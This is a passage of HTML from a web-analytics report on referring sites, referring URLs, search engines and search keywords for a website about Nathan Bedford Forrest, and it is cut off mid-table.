BGCOLOR="#74C6F6"> <TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>3, .3, 4.7, 1</WT_TABLE_STATS --> <CENTER><B>Top Referring Sites</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Top Referring Sites</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Site</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="No Referrer">No Referrer</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4647</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/">http://nbforrest.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2424</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.freebank.com/">http://www.freebank.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">933</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://billslater.com/">http://billslater.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">831</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.google.com/">http://www.google.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">461</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.billslater.com/">http://www.billslater.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">200</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://members.aol.com/">http://members.aol.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">117</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.forrestmonument.org/">http://www.forrestmonument.org/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">117</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://google.yahoo.com/">http://google.yahoo.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">102</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://search.msn.com/">http://search.msn.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">95</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://pub32.ezboard.com/">http://pub32.ezboard.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">57</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://forums.somethingawful.com/">http://forums.somethingawful.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">54</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://aolsearch.aol.com/">http://aolsearch.aol.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">52</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://roadsidegeorgia.com/">http://roadsidegeorgia.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">45</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://images.google.com/">http://images.google.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">41</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://tennessee-scv.org/">http://tennessee-scv.org/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">37</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">17</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://search.dogpile.com/">http://search.dogpile.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">36</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">18</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://auto.search.msn.com/">http://auto.search.msn.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">36</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">19</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://random.yahoo.com/">http://random.yahoo.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">32</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://navigation.helper.realnames.com/">http://navigation.helper.realnames.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">27</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD>&nbsp;</TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sub Total for the Referring Sites Above</B></TD> <TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10344</B></TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total for the Log File</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>10898</B></TD></TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopReferers"><!--Referrers & Keywords::Top Referring URLs--></A> <!-- WT_H1>Top Referring URLs</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Referring URLs</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section provides the full URLs of the sites with links to the site. This information will only be displayed if your server is logging the referrer information.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index19.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>3, .3, 4.7, 1</WT_TABLE_STATS --> <CENTER><B>Top Referring URLs</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Top Referring URLs</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>URL</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="No Referrer">No Referrer</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4647</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/">http://nbforrest.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">846</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_pics.htm">http://nbforrest.com/nbf_pics.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">531</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://billslater.com/wfs_heroes.htm">http://billslater.com/wfs_heroes.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">515</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.freebank.com/">http://www.freebank.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">268</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/forrest.asp">http://nbforrest.com/forrest.asp</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">228</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.freebank.com/nbf_1875-07.htm">http://www.freebank.com/nbf_1875-07.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">189</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://billslater.com/wfs_sec_mywebwork.htm">http://billslater.com/wfs_sec_mywebwork.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">184</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_bye.htm">http://nbforrest.com/nbf_bye.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">166</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.freebank.com/nbf_pics.htm">http://www.freebank.com/nbf_pics.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">166</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.billslater.com/forrest.htm">http://www.billslater.com/forrest.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">130</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://billslater.com/wfs_domains.htm">http://billslater.com/wfs_domains.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">85</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.forrestmonument.org/">http://www.forrestmonument.org/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">75</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_more.htm">http://nbforrest.com/nbf_more.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">70</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.freebank.com/forrest.asp">http://www.freebank.com/forrest.asp</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">63</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_controversies.htm">http://nbforrest.com/nbf_controversies.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">62</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">17</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.google.com/search?q=Nathan+bedford+Forrest">http://www.google.com/search?q=Nathan+bedford+Forrest</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">56</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">18</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_1875-07.htm">http://nbforrest.com/nbf_1875-07.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">53</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">19</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_memorial.htm">http://nbforrest.com/nbf_memorial.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">48</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_whats_new.htm">http://nbforrest.com/nbf_whats_new.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">44</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD>&nbsp;</TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sub Total for the Referrers Above</B></TD> <TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8426</B></TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total for the Log File</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>10898</B></TD></TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopSearchEngines"><!--Referrers & Keywords::Top Search Engines--></A> <!-- WT_H1>Top Search Engines</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Search Engines</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->The graphic illustrates the new user sessions initiated by searches from each search engine. The first table identifies which search engines referred visitors to the site the most often. Note that each search may contain several keywords. The second table identifies the main keywords for each search engine.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>4, .3, 3.7, 1 , 1 </WT_TABLE_STATS --> <CENTER><B>Top Search Engines</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Top Search Engines</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Engines</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Searches</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Yahoo</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">162</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">79.02%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Lycos</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">31</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15.12%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>AltaVista</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.9%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Excite</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD>&nbsp;</TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Total of Searches for the Engines Above</B></TD> <TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>205</B></TD> <TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>100%</B></TD> </TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total of Searches for the Log File</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>205</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD> </TR> </TABLE></CENTER> <!-- WT_CRLF --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>4, 2, 2, 1 , 1 </WT_TABLE_STATS --> <CENTER><B>Top Search Engines with Keywords Detail</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Top Search Engines with Keywords Detail</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Engines</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Keywords</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Keywords Found</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Yahoo&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">forrest&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">82</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">40%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">bedford&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">58</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">28.29%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">nathan&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">55</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">26.82%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">of&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">21</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10.24%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">pictures&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.82%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">the&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.34%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">klux&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.36%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">klan&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.36%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">nathaniel&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.87%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">general&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.39%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Lycos&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">forrest&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9.75%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" 